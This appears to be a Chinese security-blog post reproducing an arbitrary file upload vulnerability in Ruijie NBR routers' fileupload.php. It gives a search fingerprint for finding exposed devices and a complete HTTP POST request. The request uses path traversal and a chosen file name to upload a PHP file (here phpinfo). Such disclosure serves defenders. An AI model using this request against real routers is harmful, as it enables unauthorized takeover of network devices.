锐捷 NBR 路由器 fileupload.php 任意文件上传漏洞

漏洞描述

锐捷 NBR 路由器 fileupload.php文件存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器获取服务器权限。

漏洞影响

锐捷 NBR 路由器

网络测绘

app=”Ruijie-NBR路由器”

漏洞复现

20241226111915671-1647768741978-90d9f47d-e003-4565-9153-9ccd7fbda5cc.83f7d7b2_2024-12-26_11-18-49 (1)

出现漏洞的文件在 /ddi/server/fileupload.php, 该文件为标准的文件上传文件

20241226112037917-png (12)

文件名及目录均可控,导致可以任意上传文件

POST /ddi/server/fileupload.php?uploadDir=../../321&name=123.php HTTP/1.1
Host: 
Accept: text/plain, */*; q=0.01
Content-Disposition: form-data; name="file"; filename="111.php"
Content-Type: image/jpeg

<?php phpinfo();?>

20241226112120337-png (13)

访问上传的文件目录

20241226112243587-1647768865012-128cd155-75d0-4e94-a1fc-dbed5df6f8dc.c8a436db_2024-12-26_11-22-14 (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容